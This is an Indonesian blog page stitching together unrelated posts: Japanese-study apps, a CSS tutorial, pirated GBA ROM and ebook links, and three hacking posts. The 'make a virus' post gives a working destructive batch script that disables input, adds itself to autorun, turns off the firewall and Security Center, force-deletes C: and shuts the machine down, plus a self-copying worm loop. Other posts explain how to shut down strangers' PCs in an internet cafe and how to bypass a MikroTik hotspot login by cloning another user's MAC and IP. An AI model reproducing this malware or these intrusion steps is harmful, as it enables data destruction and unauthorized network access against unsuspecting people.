startMiner - free and simple next generation Bitcoin mining software

Jumat, 01 Juni 2012

Kamus dan aplikasi HP untuk belajar Bahasa Jepang

Suiteki2.v0.3a

Suiteki adalah satu set alat Java J2ME jepang terkait untuk ponsel Anda, kata kamus, kanji kamus, daftar kata, daftar kanji dan bahkan penampil manga! Kana / kanji input / tampilan untuk ponsel non jepang! 
silahkan mendownload :

Kanji Traning

Praktek mengingat Kanji dimanapun Anda berada. Berisi 2042 Kanji semua karakter dari Heisig's Kanji Recall. Itu membuat lebih mudah dalam mengingat kanji. Anda dapat memilih untuk Kanji atau Inggris sebagai kata kunci ditampilkan terlebih dahulu. Pilih karakter yang Anda ingin berlatih - mereka dikelompokkan oleh pelajaran sehingga Anda dapat menambahkan selagi Anda maju melalui aplikasi ini. Kanji wo renshu simashou!! silahkan mendownload :

Kanji Recall
Kanji Recall memungkinkan Anda berlatih kanji jepang di ponsel Anda, ini akan menampilkan baik sebuah karakter kanji dan empat makna atau sebaliknya. Anda dapat menyesuaikan arah terjemahan (kanji untuk bahasa inggris / on / kun, inggris / on / kun untuk kanji atau acak) dan Anda dapat memilih untuk menggunakan bahasa inggris saja, Aktif / pembacaan Kun sendiri atau keduanya.
Kanji Recall didasarkan pada daftar kanji Kyoiku, daftar kanji 1006 dibagi menjadi enam bagian pada tahun sekolah ketika siswa jepang belajar kanji. silahkan mendownload :

Hiragana recall

Hiragana Recall memungkinkan Anda berlatih hiragana Anda pada ponsel Anda, baik menampilkan karakter hiragana dan empat romaji atau sebaliknya. Anda dapat menyesuaikan arah terjemahan (hiragana untuk romaji, romaji ke hiragana, atau acak) dan apa kelompok huruf yang akan digunakan. 
Silahkan mendownload :

Katakana Recall

Katakana Recall memungkinkan Anda berlatih katakana Anda pada ponsel Anda, ini akan menampilkan baik sebuah karakter katakana dan empat romaji atau sebaliknya. Anda dapat menyesuaikan arah terjemahan (katakana untuk romaji, romaji ke katakana, atau acak) dan apa kelompok huruf yang akan digunakan.
Silahkan mendownload :

Rabu, 01 Februari 2012

TRICK CSS

Here are some tips and tricks for Cascading Style Sheet (CSS) in your blog.......

In old Blogger the css section is enclosed between <style> and </style> tags. In new Blogger the css follows the same rules except that it is enclosed between <b:skin> and </b:skin> tags. For more details on how the template is structured see Parts of the Template. These are called as embedded style sheets since they are embedded within the document itself. However you can import other style sheets using this coding :

<STYLE TYPE="text/css">
@import url(styles.css);

Put the url of your stylesheet within the brackets. The import rule must be placed before other css rules and immediately after

<STYLE TYPE="text/css">

To Highlight your words use<p style="background: blue; color: white;">Highlighting and
font color with inline CSS</p> Example :


Highlighting and
font color with inline CSS



To Highlight a single word use this :

<span style="background-">Highlighted words</span> in this sentence.

which will cause this effect :

Highlighted words in this sentence.


To Add Background image to Text use :

<SPAN STYLE="background-image: url(yourimage.jpg)">Text on Background</SPAN>


To apply an INLINE STYLE you can apply the HTML attribute STYLE as follows :

<P STYLE="color: gray;">Sentence you want to apply grey color to.</P> Example

Sentence you want to apply red color to.


SETTING LINK PROPERTIES WITH CSS - To set colors of links in the css set this code :

a:link {
color:purple; /*Unvisited link color*/
text-decoration:none;
}
a:visited { /*visited link color*/
color:red;
text-decoration:none;
}
a:hover { /*color on mouseover*/
color:yellow;
text-decoration:underline;
}

Only certain colors are recognized by name. To set other colors you will have to specify the hexadecimal number for the color. You can set the hexadecimal color by using this type of code :

a:link {
color:#0000ff; /*Unvisited link color*/
text-decoration:none;
}

For looking up the hexadecimal code for a color go to : http://www.asahi-net.or.jp/~FX6M-FJMY/java09e.html or use Color Picker which is a free color utility from iconico.com

TURN OFF UNDERLINING IN LINKS by using :

a:link {
text-decoration:none;
}


WEB SAFE COLORS are those colors which look the same on all computers and browsers. To use these your hexadecimal number should contain these pairs : 00, 33 66, 99, CC and FF in any combination. For example #669933 and #00CCFF are web safe colors.


SUPERSCRIPTING TEXT can be done using

SUP {vertical-align:super;
}

in the CSS and then in the actual post add <sup> superscripted text </sup> tags around the text you want superscripted.

FOR SUBSCRIPTING TEXT use :

SUB {vertical-align:sub;
}

in the CSS and then in the actual post add <sub> subscripted text </sub> tags around the text you want subscripted.


USE SPECIFIC FONTS WHERE POSSIBLE. You can choose a special font to display any document but if the fonts are not available on
the viewer's computer you can include instructions to use a generic font. For example :

H1 {font-family: Garamond;
} /*No H1 heading displayed if Garamond font not present */


H1 {font-family: Garamond, sans-serif;
} /*H1 heading displayed in sans-serif if Garamond font not present */

Use serif or sans-serif at the end of any font list.


BACKGROUND COLOR TO HEADINGS For this use the following code :

/* Headings
----------------------------------------------- */

h2 {
background-color:#0000ff; /*<---Add this line*/
}

Substitute the hexadecimal number as before.

BACKGROUND IMAGE.
TO add a background image add this line where you want to add the image. Here we have added it to the body.

BODY {
background-image: url(URL LINK OF IMAGE); /*<---Add this line*/
}
To change the background color add this line to the body code above:

background-color:#009900;

Choose a hex color code here http://www.asahi-net.or.jp/~FX6M-FJMY/java09e.html to replace 009900 in above code.

Replace the CAPS with the location on the web where you have uploaded your image.

FIXED BACKGROUND IMAGE
: To add a background image which does not move when page is scrolled use this :

BODY {
background-image: url(URL LINK OF IMAGE);
background-repeat: no-repeat;
background-position:center;
background-attachment:fixed; /*<---Add this line*/
}

For positioning you can use top/50% 0% (center at top), bottom/50% 100% (center at bottom), right/100% 50% (center at right) or left/0% 50% (center at left) instead of center in the above code. For more precise positioning use the percentage figures given.
The percentages 50% 50% refer to a point in the center of the page.
The default value for background-position is top left (0% 0%). For more details see How to Add Picture to Background.


MARGINS AND PADDING : Margins are space outside the element while padding is space inside the element. They are described in code as follows :

#header h1 {
margin:5px 5px 0 40px;
padding:55px 20px .25em;
}

They are described in this order : top, right, bottom and left in a clockwise fashion. When calculating the width of your blog add the widths of all the elements and the side margins to arrive at the correct figure. To change width of blog see How to Change Blog width. If only one value is specified then all have the same values. If value for left is missing then the value for right is used. If value for bottom is missing then value for top is used. If value for right is missing then value for top is used.

To center an element use :

#header h1 {
margin-left: auto;
margin-right: auto;
width:50%;
}

BORDERS surround the content and the padding and can be set using the following code (example):

#outer-wrapper {
border-style: solid; /*dotted,none,dashed,double,groove,ridge,inset,outset*/
border-width:4px;
border-color:#0000ff;
}

Other properties shown in second line in above code.

BLOCKQUOTES - Sometimes you may find it necessary to draw the reader's attention to some important points. This is done using blockquotes. You can specify the properties of the blockquote in the CSS like this :

.post blockquote {
width: 300px;
margin: 5px 0 5px 15px !important;
font-size: 1.4em;
text-align: center;
border:double #000000 !important;
padding: 0 !important;
float: right;
}

This specifies the formatting of the blockquote in my blog. Whenever you create a post select the text you want to put into a blockquote and click the quotes icon on the top frame of your Post Editor. The selected text is formatted and displayed as described in the blockquote code. See the blockquote below.
The !important declaration is used to override all others.


FLOAT : This is used when you want to place adsense Ads. within a post with the post content flowing round the Ad. The blockquote on the right has been floated right. For example in your CSS describe an element :

#adscontainer {
float:left;
}

Then in your template add this code where you want the Adsense Ad to go :

<div id="adscontainer">PASTE ADSENSE CODE HERE</div>

This will float your Adsense Ad to the left within your posts. For the new/beta blogger the code is different so see How to add Adsense in Beta Blogger.


DROP CAPS - These are used to make the first letter in a paragraph large. To do this use :

SPAN.firstcap {
font-size:300%;
font-weight:bold;
color:#D4D4C7;
float:left;
line-height:125px;
width:0.75em;
}

Then add in your blog page <span class="firstcap">F</span> tags around the first letter of your paragraph. You can change the above properties to make it more impressive. See the picture alongside. Click on picture to enlarge it.




LAYOUT OF PAGE ELEMENTS - Towards the end of the css code you will find the css responsible for displaying your Page Elements subtab under the Template tab. Here is my Page Elements page before I modified the css :



Here you can see that there is no alignment of the elements. So I modified the code as follows :

/* Page structure tweaks for layout editor wireframe */

body#layout #sidebar, body#layout #main,
body#layout #main-wrapper,
body#layout #outer-wrapper,
body#layout #sidebar-wrapper {
padding: 0;
}

body#layout #outer-wrapper {
padding: 0;
width: 1160px; /*<---Change this as per size of your #outer-wrapper*/ padding: 0 10px 0 5px;/*<-Change this as per padding of your #outer-wrapper*/ } body#layout #sidebar-wrapper {/*<--Change name as per name of your #sidebar-wrapper*/ padding: 0; width: 320px; /* <---Change this as per size of your #sidebar-wrapper*/ } body#layout #newsidebar-wrapper { /*<---Change name as per name of your #sidebar-wrapper*/ padding: 0; width: 170px; /* <---Change this as per size of your #sidebar-wrapper*/ } body#layout #main-wrapper { padding: 0; width: 535px; /* <---Change this as per size of your #main-wrapper*/ padding: 5px 10px 0 5px; /*<--Change this as per padding of your #main-wrapper*/ } body#layout #header-wrapper { padding: 0; width: 890px; /*<--Change this as per size of your #header-wrapper*/ } body#layout #footer-wrapper { padding: 0; width: 660px; /* <--Change this as per size of your #footer-wrapper*/ } /* End of Page structure tweaks for layout editor wireframe */


This caused the Page Elements page to show all the elements neatly lined together as seen here :






VALIDATING CSS can be done at : http://jigsaw.w3.org/css-validator/
This checks for any typos in your css and other mistakes.

GBA Colection game colection

Download game roms GBA secara gratis disini..Ayo download game yang kamu suka...
Semuanya gratis untuk anda..
Selamat menikmati..!!
koleksi game-game GBA gratis, tinggal klik link di "here"..
Avatar the legend of Aang
Download here..
Back To Stone
download here.!
Bleach Advance KureneiDownload here..
Bomberman Tournament
Download here..
Breath Of Fire II
download here.!
Castlevania Aria of Sorrow
download here.!
Castlevania Circle Of The Moon
download here.!
Catwoman
Download here..
CT Special Force 2
download here
Crash Of The Titans
download here
Doom
Download here..
Dragon Ball Advance Adventure
download here
Dragon Talesdownload here.!
Dream Champ Tournament
download here.!
Duel Masters 2 Kirifuda Shoubudownload here.!
Dynasti warriordownload here..
Ever girl
download here
Final Fantasy Vdownload here..
Fire Emblem
download here.!
Gameshark advance
download here..
Golden Sun 2
download here
Harvest moon friends of mineral town independent(boy)download here.!
Harvest moon friends of mineral town independent(girl)
download here..
Heroes guardiandownload here.!
Jackie Chan Adventure
Download here..
Kien
download here.!
Kingdom heart chain of memorydownload here..
klonoadownload here..
legend of Wrestling
Download here..
Love Hina
Download here..
Mario Pary Advance
download here
Medabot medabe Version
download here
Megaman 5 Battle Network Team Protoman
download here.!
Megaman And Bass
download here
Megaman zero
download here..!
Mortal Combat Deadly Alliance
download here..
Monster Rancher Advance 2Download here
Naruto Konoha Senki
Download here..
Naruto RPG Uketsugareshi
Download here..
Naruto Saikyou Ninja Daikessyu 2download here.!
Pokemon Emerard
download here..
Pokemon Red versiondownload here..
Pokemon Ruby Version
Download here..
Pokemon SaphireDownload here..
Rave Master Special attack force
Download here..
Riviera The Promied Landdownload here.!
Shaman King Master Of Spirits 2
Download here..
Shining Soul
Download here..
Sigma Star
download here
Shonen Jump OnePiece
download here.!
Star Wars The New Droid Enemy
Download here..
suikoden Card storydownload here..
Sword Of Mana
download here
Tales Of Phantasia
Download here..
Tales Of The World Narikiri Dungeon
Download here..
The Lost Age
Download here..
The Sim2download here
yu gi oh! world wide edition
download here.!
Yu Yu Hakusho Ghost files Tournament Tacticsdownload here

daftar buku pemrograman

lansung ajj tanpa basa basi download gratis buku buku pemrograman ini dengan gratis
Gartis Download Buku C++ , VC++, XML – Free E-Book<br><hr>
Tulisan ini ditujukan terutama buat teman-teman Fasilkom 2008 (Fasilkom, oke! Bukan Ilmu Komputer, <br>bukan Sistem Informasi). Mau download ebook C++ How To Program 5th Edition? Baca saja sampai habis .<br>
Silakan download ebook C++ How To Program 5th Edition. Saya tidak tahu ebook ini aslinya gratis atau <br>berbayar. Karena itu saya tidak upload di scele. Tapi menurut saya, kalau buat belajar sih tidak masalah.<br> Mengingat buku aslinya sangat mahal dan kalau fotokopi pun sebenarnya ya sama saja .<br>
Oh iya, saya juga berencana menulis tutorial praktis untuk mata kuliah DDP Fasilkom di blog ini, tentu <br>dengan bahasa C++. Itung-itung sebagai ganti karena tidak mendaftar jadi asdos DDP lagi semester ini . Tunggu saja ya… <br>
Semoga bermanfaat.<br>
INI PASWODNYA: http://www.ebooksportal.org<br>

CARA MEMBUAT VIRUS

CARA MEMBUAT VIRUS

Posted in Labels: Ilmu hacking BY SAHRUL
Saya tidak menyarankan anda utk menjalankan virus ini dikomputer sendiri!!

Virus ini dibuat dg Notepad dan di save as dg ekstension .bat
Jgn lupa utk merubah Save as type menjadi All files


BASIC

invisible command
@echo off
Swap mouse
rundll32 user,swapmousebutton
buka URL yg diinginkan
start [url]http://www.google.com[/url]
Shutdown kmptr & beri pesan
shutdown -s -t 10 -c "YOUR MESSAGE HERE" -f
Disable mouse stlh Restart
rundll32 mouse,disable
Disable keyboard stlh Restart
rundll32 keyboard,disable
Freezes kmptr stlh Restart
rundll32 user,disableoemlayer


Worm

memperbanyak diri didlm direktori
ctty nul
for %%i in (*.bat) do copy %0+%%i %%i /y >nul"
me-replace file batch yg lain
%0 >>other.bat

Trojan

mngirim dftar file dlm direktori
dir *.*>>Filelist.txt
ganti password admin
net user administrator PASSWORD HERE
membuat info IP
ipconfig >Computer-IP-address.txt

Perusak

copy ke Autorun
COPY %0 %windir%WINSTART.BAT
format drive C
format c: /q /autotest
delete Windows
DELTREE /Y %windir%
delete drive C dg paksa
DEL /F /S /Q C:



mematikan firewall & security center
net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0

Pause

pause smpai tekan smbarang tombol
pause
pause 20 detik
@ping.exe 127.0.0.1 -n 20 -w 1000 > nul

Berikut hasil akhirnya :
@echo off
cls
rundll32 mouse,disable
rundll32 keyboard,disable
COPY %0 %windir%WINSTART.BAT
net stop "Security Center"
net stop SharedAccess
echo Anda kena VIRUS!!!
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
start [url]http://www.youtube.com[/url]
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
DEL /F /S /Q C:
shutdown -s -t 10 -c "Ucapkan selamat tinggal pada komputermu!" -f
-disables mouse & keyboard
-copy ke AUTORUN
-stop Security Center
-display "Anda kena VIRUS!!!" selama 5 detik
-starts [url]http://www.youtube.com[/url]
-disable firewall
-delete c: drive
-force shutdown dg pesan "Ucapkan selamat tinggal pada komputermu!"

Computer berbicara
Dim pesan, sapi
pesan = InputBox ( "Apa yang Anda ingin saya katakan?", "Inilah suara-Ku")
Set sapi = CreateObject ( "sapi.spvoice")
sapi.Speak pesan

ShutDown Komputer Orang di LAN (Warnet)


ShutDown Komputer Orang di LAN (Warnet)

trik mematikan komputer orang lain di warnethaloo temen2 ..
maaf nii baru update hahaha gara2 bingung nyari koneksi murah wkwkw :p

kali ini pedasmaniscinta mau bagi tips luamaa banget hahaha
otak - atik bengkel komputer di warnet :D
nahh tips ini mungkin banyak dicari buat yang suka usil ngerjain temen hahaah. lewat jaringan LAN (Local Area Network) temen2 bisa shutdown paksa komputer target temen2 yang pengen kita kerjain.

okeee deh langsung aja yaaa
cappp cusssssssss cinn :))

Caranya:
1. Pada komputer, klik Start -> Run, di kotak isian tersebut temen2 isikan "cmd" (tanpa tanda petik )

2. Setelah itu muncul kotak berwarna hitam, di situ temen2 ketikan SHUTDOWN.EXE (spasi) -i (spasi) -m
Contoh: Shutdown.exe -i -m lalu kamu tekan Enter



4. Maka akan muncul kotak di samping yang bernama "Remote Shutdown Dialog"




5. Temen2 klik "ADD" -> untuk menambahkan IP target or nama target di LAN, atau temen klik "Browse" untuk mencari otomatis

6. Temen2 bisa tentuin yang enaknya buat ngusilin komputer orang itu, apakah di shutdown, restart, or Log off.

7. Tentukan time yang pas buat deat time-nya komputer itu beraksi ;)

8. Temen2 bisa tambakan other (planned), ini dimaksudkan agar si user lawan mengira kalo ini ulah server yang lagi maintenance

9. Kirim kan pesan terakhirmu ke komputer orang di COMMENT Contoh :
Contoh:
Hai boleh kenalan ngga? wkwkwwk :p

10. Tertawalah yang puas melihat orang lain kebingungan..hahahahahahahahaha


Tips dari saya:

Ini paling penting bwt temen2 inget...sebab dalam hal ini, IP temen2 or id/nama pengguna warnet bakal terlihat di comment terakhir...karena dari sana terdapat IP addres temen2 yg gunakan.

-> firewall harus dimatikan,jika tidak, cara ini tidak berhasil < -

cara menghack hotspot microtik

Cara hack hotspot mikrotik

Selama beberapa bulan ini semakin banyak trik internet gratis yang menyebar luas lewat internet. Entah itu lewat mobile broadband atau membobol warnet hotspot yang sudah saya bahas. Tidak cukup itu saja, kali ini ada lagi trik internet gratis yaitu dengan membobol hotspot mikrotik. Sebenarnya cara ini sudah lama digunakan, tetapi karena baru saja saya praktekan maka saya tulis langkah-langkah membobol hotspot mikrotik-nya.

Pertama-tama, kita harus ingat biasanya kalau kita terhubung dengan hotspot mikrotik maka kita akan dihadapkan dengan menu mikrotik login sebelum kita bisa browsing. Biasanya ini terjadi di kampus-kampus yang menyediakan hotspot fakultas atau di kantor. Tentunya kala itu kita tidak berpikir bagaimana cara hack hotspot mikrotik tersebut.

Cara ini adalah untuk mem-by pass mikrotik login, sebenarnya lebih tepat kalau disebut cloning client. Intinya kita tidak harus login dulu untuk bisa browsing, karena target sudah login. Kita sebagai clone-nya jadi tidak perlu login. Trik ini hanya bisa jalan selama client yang kita clone masih terhubung ke hotspot.

Ini dia langkah-langkah membobol hotspot mikrotik :

1. Download Netcut disini terlebih dahulu, program ini untuk mengetahui MAC address yang terhubung dengan kita.
2. Koneksikan komputer kita dengan hotspot mikrotik
3. Jalankan program Netcut
4. Pilih LAN Card / NIC yang kita gunakan dengan mengklik menu Choice NetCard
hack bobol mikrotik hotspot images
5. Kemudian klik OK kembali ke layar utama, pilih salah satu network yang terkoneksi. Yang jelas bukan network kita atau network server.
hack bobol mikrotik hotspot images
6. Salin IP address dan MAC address, bisa juga dengan mengklik PrintTable kemudian blok dan copy paste ke notepad untuk langkah selanjutnya.
hack bobol mikrotik hotspot images
7. Setelah dipaste di notepad langkah selanjutnya edit nilai MAC address, pada contoh ini [00:26:5E:60:81:1C]. Hilangkan tanda [:] sehingga menjadi 00265E60811C. Nilai ini yang akan kita gunakan untuk merubah MAC address kita.

8. Selanjutnya kita disable dulu wireless LAN kita. Kemudian buka properties wireless LAN dan ubah nilai Local Administration MAC Network, default kosong. Isi dengan nilai tadi, pada contoh ini 00265E60811C
hack bobol mikrotik hotspot images
9. Kemudian kita set IP wireless LAN kita dengan IP yang sama yaitu 192.168.182.18 dan isi juga DNS server address.
Untuk DNS server address bisa dicek sebelum kita merubah MAC dan IP. Jadi waktu pertama kali kita terhubung ke hotspot, dengan cara mengetik perintah dari command prompt
C:\>ipconfig/all
hack bobol mikrotik hotspot images
10. Langkah terakhir adalah meng-enable kembali wireless LAN kita. Sekarang kita bisa browsing tanpa harus ijin pada yang punya hotspot.
11. Hasil :
Sebelum melakukan clone
hack bobol mikrotik hotspot imagesSesudah melakukan clone

Nah, itu tandanya sudah selesai. Cara hack hotspot mikrotik ini hanya buat jalan pintas, karena sebenarnya kita bisa mencari admin hotspotnya dan meminta username dan password. Karena cara halal itu biasanya akan lebih baik daripada jalan pintas dengan cara kotor. :p